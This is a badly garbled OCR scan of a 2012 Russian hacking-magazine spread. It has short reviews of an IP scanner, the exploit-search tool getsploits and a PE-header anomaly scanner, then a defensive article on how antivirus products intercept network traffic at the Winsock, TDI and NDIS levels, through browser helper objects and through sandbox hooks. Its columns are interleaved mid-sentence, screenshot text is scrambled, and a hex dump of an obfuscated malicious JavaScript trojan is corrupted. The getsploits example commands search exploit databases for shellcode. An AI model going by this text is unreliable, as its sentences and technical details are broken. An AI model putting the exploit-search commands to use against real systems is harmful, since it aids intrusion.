пакеры и протекторы модифицируют заголов
Е сли ты являешься заядлым консольщиком,
с сетя ми и их безопасностью, то наверняка
ки РЕ-файлов. Иногда аномалии в заголовк ах
то наверняка каждый раз в поисках экс
ты должен знать о такой культовой програм
могут уронить различные дебаггинг-тулзы
nлойтов тебе было лениво открывать браузер
ме как Angгy IP Scanneг !или просто ipscan).
и другие GUI-анализаторы, затруднив таким
и залази т ь н а exp l o1t-db.com . С появлением
Данный кроссплатформенный и опенсорс
образом процесс изучения исполня емого фай
утилиты getsploits !кс тати, написана она на
ный сканер прежде всего nредназначен для
ла. В таких случаях тебе поможет Ex eSc an-
Питоне) необходимость в этом отпалаl Данная
сканирования диапазонов I Р-адресов в сети
скрипт на Python'e, специально предназначен
тулза может иск ат ь определенные сплойты/
и соответствующих им открытых портов.
ный для в ы явления таких аномалий. Утилита
шелл-коды/описания сплойтов с помощью
Прога просто пингует каж д ы й айп и шник
быстро сканирует выбранный исnолняемый
нескольких nоисковых оnций, а затем выво
на проверку его жизнесnособ н ости, затем
файл и об н аруживает все виды возможных
дить описания и лин к и для всего найденного
опционально получает имя хост а, М АС - адрес,
а н ома л ий в его заголовках. Обнаружение
стаффа.
список открытых портов и так далее .
п роисходит с помощью nодсчета контрольной
Кстати, с помощью плагинов !которые ты сам можешь написать на javal вnолне реально н е
сумм ы , размера различных полей в заголовке ,
хи ло расширить список получаемых данных .
размера сырых данных, выявления имен
non-
ascii/пycтыx секций и так дале е.
Также в сканере присутствует целый ряд приятных фич вроде получения NеtВIОS
Основные опции утилиты :
о: вывод результа т ов в файл;
q: «тихий » режим работы; h: по казать экран помощи .
Функционал скрип т а :
информации !имя компьютера, рабочая груnпа
ав т о м атизация поиска аномалий в РЕ;
Опции поиска :
и имя текущего Windows-юзepal, определения
опреде л ен и е сигнатур компиляторов и па
--au t hoг:- автор эксплойта;
веб-сервера, сохранения результатов скани
керов;
рования в CSV-, ТХТ- и XM L- фо рм аты.
с к анирование AP I д л я известной ма лв а р и;
Чтобы начать процесс скана, необходимо
отображение заголовка Р Е и таблицы им
nросто вбить желаемый диапазон адресов
п орта;
--plat f oгm:- платфо рм а ! в ыбор из 47 nунктовl; --type: ти п сплойта --osvdb: ОSV D В-идентификатор сnлойта; --cve: СVЕ-идентификатор сплойта.
!нап ример, от 192.168.0.1 до 192.168.0.255)
н ативная nод д ержка генерации различных
в соотве тствующие окна или применить
отчетов.
Примеры поиска различных эксплойтов :
опцию их случайной генерации, а затем на
Д ля использования сканера тебе н еобхо
getsploits.py -о l inu x_shel l code.txt - -type shellcode gets ploits . py - о freeb sd_x86-64_local. txt - -pl atform 10 gets pl oi t s .py --a ut hor maxe v bull et i n
жать на кнопку старта. В результате начнется
дима питоновекая библиотека PEFile от Эра
многопоточный nроцесс скана, результаты
К а р реры . Н айти ее ты также сможеш ь на на
которого ты сможешь наблю д ать прямо у себя
шем диске. П р имер заnуска сканера: exesca n .
на экране.
РУ
Х АКЕР
-а
<path t o
е хе
fil e .
073
04/1 59/201 2
www.epidemz.net
MALWARE
Евгений Дроботун ldгobotunГclxakep.rul
s -· L Что у нас осталось? Дай-
к а вспомнить. А, вот что :
s m s u
к онтроль сетевого трафика и противодействие drive-by
з агрузкам, а также способы з апуска подозрительны х
приложений в изолированной и контролируемой среде
[им е нно так правильно раскрывается понятие
« nесочница » ]. Разберем все это прямо сейчас!
ОСЛЕЕJ. ЯЯ СТ ЬЯ УСТРОИСТВЕ АВ РОВ:
МОНИТОРИНГСЕТЕВОЙ
АКТИВНОСТИ И ПЕСОЧНИЦЫ ХАКЕР
07~
www.epidemz.net
04/159/2012
С антивируса ми покончено!
Общие
Проверка подлинности
l~--------------------------~
Се1Ъ
Дополнительно
Подключение через :
Подключение чере з:
1Щ1 AMD PCNET семейство PCI Ethern
~
1 Н астроить...
QТh1еченные компонен ты исnольз)'IОТСЯ эn1м подключением :
л
-
J
~Ю ~ L.лужоа .аt1ступа к q;>аилам и принrерам сетей Micr<
~ ~ План1~оовшик пакетов OoS
v
<
>
1 Уствновить... 1 1L.._--'!далить 11 = - - - - -- J
Своf!ства
находится библиотека
ws_32.dll,
в которой
реализованы функции Wiпsock [send, гесv,
r/!1 Кaspersky Antr-Virus NDIS 6 Rier
conпect и так далее!. Большинство приложе
U
~'
ний взаимодействует с внешним миром [то
r uaroox onogeo
rче worкrng
] vnver
~ ...._ Протокол Интернета версии 6 ~
..&.
СР 11Pv6)
Протокол Интернета sерс~1и 4 (ТС Р/1Рv4}
Позвол~ет данному комnь ютеру получать доступ к
1 Устgнови1Ъ... 1 L[_ _"laa ="-""'_:_---'1 1 Сво~стеа Оnисание По3е оnяет аанном)' компьютеру получать дОСТ)'П к ресурсам в сети Mtcrosoft .
~ УведОМlJЯТЬ nри ограниченном или отсутствующем
есть с Сетью! именно через эту библиотеку, перехватив вызовы функций которой, можно легко посмотреть все, что эти приложения
отправляют в Сеть или принимают из нее.
"'
Microsoft.
~ flpи подключении вывести значок в области уведомлений
можно представить в виде не
скольких уровней. На самом верхнем уровне
0
~ ~ Планировшик пакетов OoS ~ ~Сл;-жба дОСТ','Па к Файлам и nринтерам сетей Micrc
Описание ре сурсам в сети
Windows Настрои ть ...
,!;омпоненrы, используемые этим по.о.ключением :
[ ~- ~ avast! Firewall NOIS Filter Driver
роще н но модель сетевой подсистемы
VirtuaiBox Host.Qn~· Bhemet Adapter
подключении
Когда-то давно некоторые брандмауэры и другие системы защит так и поступали, но в настоящее время так уже никто не делает, поскольку, во - первых, зловредные приложе
ния могут работать в обход
11
ws_32.dll,
вызывая
функции более низких уровней, а во вторых,
NDIS-фильтры , устан овл енные в системе Avast 'oм и <~ Касперским »
большая часть сетевого трафика также может проходить на более низком уровне.
lil
Ниже
ws _32 .d ll находится драйвер afd.sys
о мнению операционной системы от
ч то удовлетворяет заданным условиям, про
Майкрософт, файлы из интернета
пускается, остальное- блокируется [с экран
[ Ancillaгy Funct i oп Driveг for WiпSock- вспо
могут быть полезны. А еще они могут
ным предупреждением или без н его, с записью
могательный служеб ны й драйвер!, в котором
быть вредны . И для того, чтобы отделить
в журнал событий или без- в зависимости от
как раз и реализованы все функции работы
первый тип файлов от второго, рядовой юзер
настроек компонента сетевой защиты!.
с соке там и [создание сокетов, установка
сое динения и так далее!. Можно сказать, что
использует антивирус. А как современные
И опять мы вышли на ту сам ую - нашу
антивирусные средства определяют «бла
любимую :1-двухкомпонентн ую схему анти
ws_3 2.d ll
гонадежность» того, что идет из сети? Как
вирусной защиты из самой перв ой с татьи. Есть
невую обертку над
различные системы защиты могут проконтро
не что, что «сидит» на всех возможных путях
то между
лиров ать и остановить трафик, порождаемый
сетевого трафика в компьютер е и перехваты
и
вредо носными программами?
вает этот трафик, а есть нечто, что анализирует
межуточной обертки. Н екоторые брандмауэры
этот трафик и принимает р е ше ние о дальней
<<са дятся>> на эту библиотеку с целью филь
чала необходимо определиться с некоторыми
ших действиях. Эти два <<неч т о>> и являются
трации трафика, но эффективность такого
основными вещами. Прежде всего, понять, чем
технической и аналитиче ской соста вляющими
ре шения оставляет желать лучшего, поскольку
является компонент антивирусной защиты, от
компонента антивирусной защиты, ответ
в ре даносы могут запросто обратиться напря
ветственный за безопасность взаимодействия
ственного за сетевую безопасность.
мую к
Чтобы ответить на эти вопросы, для на-
Аналитическая составляющ ая в своих
с се тью. Это не что иное, как фильтр, который
представляет собой высокоуров
afd.sys. Если быть точнее, afd.sys и ws_32.dll находится еще msafd.dll в качестве так называемой про
afd.sys,
а то и вообще мимо всех со кетов .
Опуст ившись еще ниже, можно увидеть
находится между приложениями и сетевыми
действиях опирается на сигнатуры и эвристи
драйвер
компонентами о перационной системы, решая,
ческий поиск: шаблоны, правила, весовые ко
ЧТО МОЖНО, а ЧТО НеЛЬЗЯ. Для ЭТОГО ОН ПрОИЗВО
эффиц иенты- все то, что мы уже << проходили>>
протокол tcp/ip. Это так называемый уровень транспортного [или сетевого! протокола TDI [Тгапsрогt Data lпteгface- интерфейс пере дачи данных!. Здесь также можно найти,
tcpip.sys,
в котором реализован
ДИТ внедрение указанного фильтра в ключевые
ранее. А вот о том, что касается тех нической
места взаимодействия приложений и сети, осу
составляющей, - той само й, кото рая должна
ществляя анализ всего трафика на предмет со
перехватывать трафик на все х возможных
например, пwlпkipx.sys, реализующий про
отве т с твия определенному набору правил. Все,
путях,- мы поговорим более подробно.
токол
ipx.
Для фильтрации трафика на этом
f4e5e(tn9'1~
Jt Diш~ ] ~ OeЬuoYitw ]tJ' S'rSWOS..W:eDI!fЩ)tOI'i~ ] il' ~I'SI:ernStr<UDtw\:МfT.Ы.Shmw ] Q
тne: .. nJP~DeюoiiiOtT.Ы.
.:),
~•IIIIМDdfktt!Onl !
-------- ------ ------------- -- ----- ----- ----------------------------------
; Ndi installation support
-------------------------------------------------------------------------
""""'~
''"""" Oxf83Мl'\C
1~1~ :;
ах~'~
IATМodkeUon :;., IAT~ ;:. IA1Мod{QW1 ;:,_,
O>:I'O'!Dme
D>:F8'S96780
DFfAS9110 !)fi'AS9110 DI'F/159110 OFH59110
6031DOel 6037DOeJ 603JD081
D.<IIOSIII'AU•:C:\WJNXJWS\oyot....nyc............. [PAQ:):Joer..t~ Oxti059fAOI'::C:\W~Jytt~ ... exe[P~o;;;fj:JQCrutt()r;(o 0d059FAU::C:\W~Ofi·t ...ц,[Pдo;;;f]:JQC/o.Ce0rt!Co 1)(8()5\IFIOI' :: C:\W!IOOWS\rntetl'l32\rii:OI»... U1[P.:.GE] :It:IIЛ~.O.VO:.
ОхFезпоо \...CC:..c:.:...::..::..__ _ ,.,__.:..c.c '_:_''n:-,~ ,-'::~-',:::'~:.,.-:-;:c,':..:.~:..c~~'.-,-''::"" -" ••-'.,':-';:.~-' - ~P< ..:. '':c:.=:-.-"""-'"'""""""' -=="..:.·'..:. " :... '"="1-=T...: ""-'-"-'-'--'.J
1
КernciDctccllwv12
*
f ..
dweng(neexe
Se(~~
o-Иiftllet j ~ DtW;Yiew ]<7 SVStttnSen1ceo.sщ.tOtT~ j j> S\"SS:It!ISen-i<•DI!wdot r.ы.~ j Q IN:wn.fi:Diшt«ori.Ы. J} ~l!lne!мodticatioriS 1
[rns t_Ndi] HKR, Ndi, servi се,, "KLIM б" HKR, Ndi ,coser vi ces , OxOOOlOOOO, "KLI Mб"
Зн~ч~ни~ F il t~rC i llss оnред~л ;~ ет nолож~ ни~ '~груж.,~мого Qильтрi!l е очереди. ее его
нкR, ~m·~~~~~~~ii~~~;q можетбь1тьеосемь3н.,ченL1й.
HKR, HKR, HKR, HKR, HKR, HKR, HKR, Ndi . ~ i1terRunтype, Ох00010001, 2 HKLM, sys t em\ Cur г entcontгo 1set \ Sec vi ces \ KLl
ndiS\'lan, ndis\·Janas "klimб"
~~~~~бs~; ~:~~~~; ~~~tCOI1tГO 1 Set \Seгvi ces \ Kll, ------------------------------------------; ser vice insta11ation support Кerne1Drtectlvev12
*
Fle
~lir>Oo
WU411Cite.c
[rnst а 1 1. servi ces]
~
О!и!:~ ~ ~ OetiuQV..... ] (/'\ Syot.m58Мr:e[)eJЩ(O'T~ ~
0.'' ~Vhi'ISIМ:IDeюfr>tct' Tibll!~ ~ 0
Adds er v ice=K L IMб, , K L IMб_s e rvic e_rnst
!ШtrЩDeюdOtl.tlll
[KLit-1б_se г v i
Значение F ilt ~rType оnределя~т тиn Фильтра , е данном ел~ а е Ох00000002 говорит о том, что
дpailsep модиQицирующий
ce_rns t ] Di sp1 ayName - %KLI,..1б_Desc% Servi се туре .. 1 ; SERVICE: _KERNEL _DR IVER Startтype "" 1 ; SERVICE: _SYST E:M_START
П е ре хва ты из
ce Object
ХАКЕР
loCreateDevice в << Касперском >> и DrWeb, пере х ват TdiRegisterDevi-
Часть содержимого iпf-файла драйвера фильтра
tdi.sys в
Касперского »
« Касперс к ом » шестой и седьмой версий
klim6.sys из состава << Антивируса
075
04/159/2012
www.epidemz.net
MALWARE KerпeiDetectivev1.2::VBoxTray• File
Settings
Help
~ DisassemЬier 1 ~
Debug View
1С?
ТаЬiе 161'
System Service Descriptor
System Service Descriptor
ТаЬiе Shadow 1,:;;;.
1Len 1 state
Address
5 5
Ox8052D903 Ox8052DF74 Ox80534DM
ТаЬiе Ь
Kernel ~lodifications
1
1 Current Value 1 Original Value \ Dist ination Module Е 97058 4 ...
Relative Jump :: jmp OxF69D3 178 Relative Jump :: jmp OxF69E8650
Е9
D7
Аб
4 ...
се
OxF7525DЗ4
ЕАТ ~lodification:: OxF751261E
OxF7525DCC
ЕАТ Modification:: OxF75127FD
-> NDJS.SYS (PAGENPNP] ::NdisCioseAdapter
Е?
02 02 ЕВ 02 Е7 02
·> NDJS.SYS [PAGENPNP] ::NdisDeregisterProtocol OxF7508397 ·> NDJS.SYS (PAGENPNP]::NdisOpenAdapter
ЕАТ ~lodification:: ЕАТ ~lodification :: OxF750817D
Е7
·> NDIS.SYS (PAGENPNP]::NdisRegisterProtocol ~-
1 ·.
Settings
Interrupt Descriptor
--~
~---
00 00 00 00
FA 8B450 ... FA66837 ... FA
OxF69D3178::0xF69E8650 :: -
1Е260100
OxF752E750 :: OxF752E7FO:: OxF752E820 :: OxF752E7BO ::
FD 27 01 00 97 83 00 00 7D8 1 0000
inspect.sys [.text] inspect.sys [.text] inspect.sys [.text] inspect.sys [.text ]
-~~---~-~~--
~.'t.a!.-...,~: ...
~~
~
·--~
~
·
Help
~ DisassemЬier 1 ~
Debug View
1С?
Т аЬiе 1dJ'
System Service Descriptor
System Service Descriptor
Т аЬiе Shadow 1Q
Interrupt Descriptor
Т аЬiе
1
Kernel
~lodifications 1
Address
Distination Module
OxF8397F08 Ox804D8F94 ~~~~~~~~~~.~o~o~~~~.~~nm~~----~~----~----~--~--~~--~
OxF7 13AB04 :: С:\ WINDOWS\system32\drivers\afwcore. sys [ .1 OxF7804C78 :: • OxF77CF9CO :: •
Ох804D93Вб
Е9
Relative Jumo :: imo OxF77CF9CO
.. .
FA 8...
Пер ех ват NDIS-функций антиви русом от компании Comodo (вв е р х у! и в OutPo st Fir eWall Pro 7. 0 ! вни зу(
уровне необходимо перехватывать все вызовы
драйвер сетевой карты, поэтому антивирус или
с око, да и такой фильтр-ловушка может быть
к устройствам \Dev ice\Rawlp, \Device\Udp и\
брандмауэр, <<си дящий>> на NDIS-ypoвнe, пере
установлен в системе все г о лишь один.
Device\Tcp [в случае работы по 1Pv6- \Device\ Rawlp6, \Device\Udp6, \Device\Tcp6 соот
только проходит через компьютер .
хватывает практически весь трафик, который
ветственно]. Это достигается либо вызовом
В этом вопросе все известные а н тивирусы проявляют единодушие- чтут рекоменда
Сегодня подавляющее большинство пра
ции компании-прсизводителя операционных
вильных антивирусов контролируют трафик
систем и третий способ в своих продуктах
указателей таблицы диспетчеризации, либо
именно на этом уровне. Существует по мень
не применяют [хотя, говорят, встречаются
перехватом loCгeateDevice до инициализа
шей мере три более или менее документиро
производител и, которые эти рекомендации
ции этих устройств, чтобы в дальнейшем
ванных и легальных способа проделать зто.
игнорируют, но мне что-то такие антивирусы
полностью их контролировать. Некоторые из
Первый способ !самый легальный из всех и ре
и брандмауэры не попадалисьl.
антивирусов именно так и поступают. Напри
комендованный Microsoft к использовани ю]
мер, ранний « КасперскиЙ>> перехватывал эту
это так называемый
функцию путем модификации таблиц импорта
[пр омежуточный драйвер NDIS]. Вт орой способ
применяют либо только первый, либо первый
в нужных драйверах, так же делает Dг.Web,
[его еще иногда называют <<nсевдопроме жу
в сочетании со вторым, и лишь некоторые до
изменяя таблицу им п орта в драйвере
точный драйвер>>] есть не что иное, как пере
вольствуются только вторым.
loAttachDevice,
sys.
либо прямой модификацией
tcpip.
Для этих же целей <<КасперскиЙ>> шес т ой
и седьмой версий перехватывал функцию
TdiRegisterDeviceObject
из
tdi.sys,
модифици
lnteгmediate
хват некоторых функций из
Driver
ndis.sys. Третий
способ- Filter Hook Driver [драйвер фильтра ловушки] представляет собой обычный kernel-
руятаблицуэкспортаэтогодрайвера.
mode
драйвер, который фильтрует сетевые
пакеты на уровне
Далее, еще ниже, находится драйвер под
названием NDIS [Network Driver lnterface
Specification-
NDIS
IP. Microso ft
категорически
не рекомендует использовать этот способ
Промежуточные N ОIS-драйверы в антиви русных программах могут быть двух видов: не
посредственно промежуточный драйвер - как правило, в
Windows ХР,
так как других там и не
предусмотрено [NDIS версии
51,
и драйвер
фильтр- эта разновидность промежуточных
в средствах контроля трафика и антивирусной
NОIS-драйверов появилась начиная с
защиты. Этот драйвер ставится слишком вы-
Vista [NDISвepcии
спецификация интерфейса
сетевых драйверов]. Ниже него -только
Что касается оставшихся первых двух
способов, то подавляющее большинство
Windows
61.
Остановимся на различиях промежуточных драйверов и драйверов-фильтров. Итак, когда трафик движется в сеть, то есть от протокола
Управл е ние надстройками
к сетевой карте, он проходит через очередь
пользовательских драйверов, которую сфор Просмотр и управление надстройками. установленными на этом компьютере . Отключение или удаление надстроек может наруши-rь работу некоторых веб-страниu .
мировал
NDIS.
Внутри этой очереди распола
гаются промежуточные драйверы, которые выстраиваются в очередь по неизвестному
Qтобража-rь : [ Надстройки. загруженные в lntemet Explorer Имя Разрешено
~
Издатель
алгоритму, однако спецификация гарантирует,
·] " Состояние
что трафик пройдет через каждый драйвер Ти п
(5)
в этой очереди. Промежуточный драйвер пред ставляет собой обманку: <<сверху>>, то есть для драйверов, которые располагаются над ним,
Research
Разрешено
Расширеf
он выглядит как минипорт [хотя настоящие минипорты еще далеко внизу], а «снизу»- как
~ Виртуальная клавиатура
Kaspersky Lab
Разрешено
Расширеf
~ Проверка ссылок
Kaspersky Lab
Разрешено
Расширеf
В свою очередь драйвер-фильтр - это
~
Fi lterBHO Class
Kaspersky Lab
Разрешено
Объект м •
драйвер, который располагается также на
~
IEVkbd BHO Class
Kaspersky Lab
Разрешено
Объект м •
протокол [хотя протоколы далеко вверху] .
пути следования трафика от сетевой карты до протоколов, однако конкретное его местополо
жение в очереди определяется настройками, Модули ВНО от « Антивируса Kacnepcкora» в
lnternet
содержащимися в inf-файле зто го драйвера-
Е х рlог ег
ХАКЕР
076
www.epidemz.net
04/159/2012
С антивир ус ами п окончено!
фильтра. П о мим о месторасположения драйвера-фильтра в iпf-файле указывается еще и тип этого др ай в е ра: драйвер-монит ор, дающий возможность только nросматривать
трафик, или драйвер-модификатор, допускаю щий еще и модификацию трафика. Дум аю, понятно, что второй тип в антивирусах исполь
зуетс я гораздо чаще, чем п ерв ы й. Другая возможнос т ь контролировать
ПЕРЕХВАТИВ ЭТИ ФУНКЦИИ, МЫ СМОЖЕМ КОНТРОЛИРОВАТЬ ПРОЦЕСС ИНИЦИАЛИЗАЦИИ ВСЕХ СЕТЕВЫХ
СОЕДИНЕНИЙ, А В ИТОГЕ- ВЕСЬ ТРАФИК
трафик на NDIS-ypoвнe- это, как мы уже гово рили, перехват некоторых функций
из NDIS-дp aйвepa. Из всего многообразия
на них! гораздо целесообразнее и проще осу
ссылки, которые, равно как и со держим ое
функций, экспортируемых этим драйвером,
ществлять непосредственно в самом браузере.
адресной строки, необходи м о о т слежи вать
наиболее подходящи ми для данных целей
Для этого многими антивирусными продук
и контролировать. Помимо вредоносных
будут Ndi sOpenAdapteг и NdisR egisteгPгotocol.
тами используется возможность наращивать
ссылок, в содержимом веб - с траниц могут быть вредоносные Jаvа-скрип т ы, для распознава
П е р ехватив эти функции, мы сможем контро
функциональность браузеров посредством
лировать процесс инициализации всех сетевых
расширений. Чаще всего используются ВНО
ния которых на помощь о пять-таки приходят
сое динений, а в итоге- весь трафик , про
антивирусные базы с с и гнатура ми.
ходящий через эти сое дин е ния. Так поступает,
IBгowseг Н еlрег Object- модуль поддержки браузераl . Модули ВНО реализуются в виде
например, ан ти вирус от компании
dll-библиотек, которые дополняют lnteгnet
няемую базу сиг н атур вредоносных скриnтое
Comodo,
В общем, имея хо р ошую и регулярно попол
который помимо установки промежуточного
Ехр l огег. Как правило, объекты ВНО не имеют
и ссылок на вредоносные сай ты , м ожно д о
NDIS-дpaйвepa еще и перехватывает функ-
собст венного пользовательского интерфейса
статочно успешно отсеиват ь почти всю заразу,
ции Ndi sDpenAdapteг, Nd is Reg isteг P гo toco l,
и су щ ествуют в виде простой библиотеки, ко
которая может встрети т ься в сети. Почт и
NdisCioseAdapteг и Nd isDeгegisteгPгo to col.
торую браузер подгружает nри старте. Сп е ктр
всю- nотому что какой-нибудь свеженький
Н екоторые системы защиты интернет-
возможного применения ВНО огромен - от мо
скрипт, которого нет в базе, будет наверняка
трафика довольствуются перехватом только
дуля, который отслеживает вводимые в адрес
пропущен и с делает свое черное д ело. Б олее
NdisOpenAdapteг, который позволяет отследить
ную строку данные, до подмены содержимого
того, даже самый с т арый с крипт, который есть
уста новку и инициализацию сетевых адапте
веб-страниц и перенаправления запросов.
ров в с и стеме. Самое гл авное nри использова
Чт о может сделать с содержимым, к при
во всех антивирусных базах, можно за пр ос т о зашифровать или обсфусц ировать по-новому,
нии такого рода перехватов функций- успеть
меру, адресной строки антивирус, перехва
перехват и ть их раньше, чем произойд ет иници
тивший посредством ВНО данные из lnteгпet
може т пройти мимо всех препон, выстав
ализация какого-нибудь се т е вого соединения,
Ехр lо гег 'а? В о -п ервых, nрогнать э тот адрес по
ленных антивирусн ыми ска н е р а ми сетевого
иначе контролировать его уже не пол учится .
своей базе вредоносных ссылок и заблоки
трафика.
ровать вывод страницы в случае наличия за
-и вот он уже и не такой с тарый, и запросто
Поэтому на помощь приходят эврист ик а
прашиваемой ссылки в этой базе. Во-вторых,
и динамический анализ ко д а [ то ест ь его ана
можно обратиться к различным облачным ре
лиз во время исполнения!. К примеру, при ана
сурсам [собственным или посторонним! и, в за
лизе html-кoдa антивирусы смотрят на пара ме
y poвнe, можно было бы на э т о м и успокоиться.
висимости от наличия этой ссылки в их базах
тры, используемые тегом if г ame !напомню,
Но все же контроль за со д е ржимым адресной
или на основе различн ых рейтинговых оценок,
этот тег в тексте страницы часто используется
строки браузера, веб-страни ц и jаvа - скриптов
предупредить пользователя о nотенциа льно й
для н ев идимой инеконтролируемой загрузки
[а ответс тв ен но сть за распространение
вредоносности посещаем ой страницы.
вредоносных объектов!. Если эти параметры
нечно, перехватив весь трафик на
ND IS-
вре д онос н ых программ посредством dгive-by за гру зо к в боль шин с тв е случаев лежит именно
'" '" ·~ ill..
li iil
'"'
т~
663 t"'",J0248) 6681"'-.898722 726 183.829SOf.i ~48 185.969SS1 762 186.0:270J .. -~- 187. 065:"28 Р8}8 7 .11.,."](
ООО!Ю
000.110 ОООЬО
000<:0 OOOdO оооео
OOOfO 00100 001 10 00120 00130 00140 00150 00160 001 70 00180 00190 ооао 001ЬО 001с0
001d0 OOleO OOlfO 00200 00210 00220 ооно
00240
0'1 IC2 ..
•
:,~t",....н,~.н.~
~~~~~. U
192.168.0.102 94.100.191.213 192.168.0.102 191.168.0.102 192.168.0.102 192.168.0.102
~ . 100 . 191.213
-~~~
ze
О•
бе п
73
Ze
ба
20 Zit. 20 68 74 ; .:
71 1S
бS 0&
бS
12 79
20 211.
О.а
2е
20
30 30 39 2d )0 32 2d
Jlo Н 31 20 2d 30 35 30 З1
39 20 415 CIS 62 69 73 69 28 66 75 бс Jd 7.:1 бS 72 79 1S бS 72 6е 28 45 77 20 бf 7d 2с 4.1 Sc 7} 29 Sb Sc 77 Se 3~ 23 6• 3d 6f 6t 69 74 29 7Ь 45 69 66 28 68 69 73 6е б 7 74 6S 78 11] 7d 69 22 13 74 44 2е 65 28 47 Sb
бS
76 2f о~ 61 72 20 ба Sl 75 2t 6~ 51 74 69 6f 20 бе 65 2С 46 29 28 2е 7с St 23 28 Se 2е Sb 6f 2е 66 3d 7 Ь 69 4S 2с 48 6е 74 ЭЬ 29 7 Ь 74 2t 6с 65 6f 6t 14 74 68 69 Jd 3d 3d 20 н зd 4 7 26 26 52
2~
~~~~ ~ ~~ ~~
12 ~~
20 32 6f 61! 6е 63 68 69 2с 70 79 3d 2с 46 2е бб
3d 2f 2Ь 3t 2d Sd Sc Sb 2t 70 3а 66 3d 45 45 2t Sb 30 68 3d Jd 45 66 28 72 69 78 6S 31 Sd
Непосредственно в самом соде ржимом
кажутся ему подозрительными !типа высота
веб-страницы тоже могут т аиться нехорошие
и ширина равны нулю или очень маленькие!,
• .LV<t
192.168.0.102 94.100.1""91.НЗ
9.1.100.191.213 94.100.191.212 21","],200.219
10 J;r,
zr zr
64
бt
63 7 3
63 б f бd 2f 4с 69 63 бS 2il 20 44 61 74 бS 3• 20 з; ];r, н s.: 68 7 S 2с 29 Оа 20 ~~ 32 з.: 36 О~ 6 е 28 29 7 Ь 2с 79 3d 6с
]1 39 20 )1
]4
30 20 28 зо зо 39 3~ 20 36 1-1 69 6f 73 2с 67 Jd 6с 2е N бс 2е 24 3d 29 7Ь 72 6S бе 2е 69 6е St Sb Se ]С 29 Sb Se )е 2Ь 29 24 2f Sc 2е 2с Sd 12 бf 7J. бf 1S 6е 63 74 7 с 7 с Ы 6f
20 20 20 76 21!
бе
бf Ы
2с
66 74 69 Sd Sd 2с
2~
74 69 63
б5 ~
5d 3d 4S 3Ь 31 3Ь 74 68 Jb 72 65 74 74 79 70 65 бе б7 22 29 63 за 4S 29 7 с 7 с 21 48
74 69 75 6f 7Ь
эь
29
6f 3d бс 75 бе 63 75 72 6е N 28 45 2~ 28 3С U 24 7 с 66 3d 2f 24 2f ЗЬ 79 10 65 бf бе 28 75 6d 65 79 70 65 68 69 73 7 3 2t f'Н 72 6е 20 66 20 45 76 6 1 12 69 66 28 29 7 Ь 69
~~ ~~ ~~ ~~ !~ ~~ ~~ ~~ ~~ ~~ ~~
Те кс т Jаvа- с крип т а в перехваченном httр-трафике
Обфусцированный вредоносный Jаvа-с к рипт под названи е м Trojaп-Dowпloader. Js . Ageпt .
ghd !понять, что он делает, довольно з атруднительно!
ХАКЕР
04/159/ 2012
077
www.epidemz.net
MALWARE
f.oh
l]poo..
ko
-
ISI4f>a-• '""''"'
[fJ&Of.O.DИ l1'11 .. NI · MI 1·(~1lf~ 1 1 FXI JI .r..I ~-IM(.U8 1-Canl\IKDI I
\fШ.t1<· 1o',..&.М.&I I •·f91< ~.01
~ Рц1
m.t · Wm0Ьg:6.12.0002.Ш Х86 Eol• idit ~""" I!Rug W\ndow ~tlp ~ '1 ! .:}1'1'• i'JU\lP1 1 '-'!~ IЫ~ CJEJ O:,ВIU1DD!!:![I)Ш д,. 11§
Про
NDIS мо ж но почитать на ~
[ FJOJН2~ - I IJ<·IIDI·I8r1 .(10(/Wf&ШUIJ ( llilcJ6C.4,ocO- IJ<I-IIIW1 «1•oOiltl~ l
..,.,
......,._.oci Catopfl
76fb8? o 790
ru/story/yyedenje-v-
nop
ntdllllltllot•IVChsngeMult~~~~m~~~mJ~~~~~~ 76fbB?oB е9•3о321106 ар SЫ. •D 11 1Sb !eD11 StortCOK+Ox1? 40 {7d242b90) 16fЬ87 •d Ьо. 000Э fе1f х. = ar se1· а ys e lt u rfeOЭO O )
~<~,-ж.... и О Ш<"Рt
(1 1\l <lbl>NcO • II<I·ЬIIIl.OOo.oolo~butJ ! !IIЩfJ.focO•il<l • !r6d!:/J!1ttOQb~ШI!
1
?6fbB?b2ff 12 c:all ?6fb8?M с:23000 ret 76fb87b790 nc:~p nt d lll ZvOpenD ~ rec;tgryOb]ec::t
dvcrdptr[otd x J
76tЫ7Ь8 ЬВЬ7000000 761Ы7Ьd Ь..ОООЭfо?f
маv
eax . OB7h
76fbB7c: 2 ffl2
c:all ret
76fЫ7c:l с:20с:ОО
76fbB7c:7 90 76fЫ7с:8 е9с:Э7 4 2ВО6 ntdlliNtOpenEvent
~~:~=~~~ ~~~OЗfo?f
7HЫ7ddЬ.OOOЗfe1f 76!Ь87e2fl 1 2
!fSOШJJ •C Ш · UDJ.utt.otii:IOUIIflЩ (fSO?IFIJ.CШ · IIDJ.tHII-ooooRift1Щ
76fbB7e4c:20c:OO
( 1ffeOЭ OOJ
ась
jмр Sbl.eD 1 11SЬi oD11 GetHand1ePath +Ox9e SO (7d2Эfc:90J ~~=~~~~~~~~~~~~:illj},
dvo~
00 )
ptr [edx}
OCh
~ ~1 ~~ ~~~"ЬеЬiООО~~О i r
( FXIШ1HШ · IID I .fifl~llftl!:I J
[FI071FIHIII•\ IOI .. it\'1.000ШIFUЩ
edx . c:~ffse t Sho.redUaerO..taiSyate• Cal !Stub dvo rcl ptr (edx]
nc:~p
7 6 fЫ7d4 с:20с:ОО 76fЫ7d7 90
[FI071HHJSHID1-&910-0000FIIFШ11
З Оh
u.~t .O B9h
c:a ll
adlt . of f aet SharedUnrO..tal Syata•C. 11S tub ( 1f fеОЭОО ) dvord ptr (l:dx) ась
76fЬ87е?~!~ОИ*!~:-~~!!~~~~~~~~~~~~~~
( fS01tf)j-CШ·IIOJ*ВoOIXIOIIIfiШJ
(fXI11fJH5JI · IIOJ·191f-OO:IOfllfE2ll l
!\
( fS0 7 1f11~1 · 110) . .1f«<XXfflffJ11. ) \ F:107111 1· 01\•iiOJ . -oOI))OAJfШ1 )
dvc:~~
ptr (edx]
IOb
{ f~)I .Q SI · IIO ) .мti-OOOOFI\fi.U1 )
!Ldl$ lнa русском! или на JIШ!n.mlп~ com/en-usliibraгy/ ~ lnо
-
анrлийски)
Содержани е двух
nредыдущих статей цикла ищи нашем
ОО)
ди ске.
( FmJ!f11 .(SSI·IJOH911.oocort!fШ!. )
!:~~:~~ -~~~~-==:~~ Перехват некоторы х функций и з
Замена стандартного обработчика Jаvа-скриптов на собственный , выполненная н днтивирусом Касперского ~>
то это повод навострить уши. Тем более, что
iframe
используется все реже и реже.
Что касается зашифрова нных, обфусци
ntdll.dll, выnолненный nесочницей SandboxiE
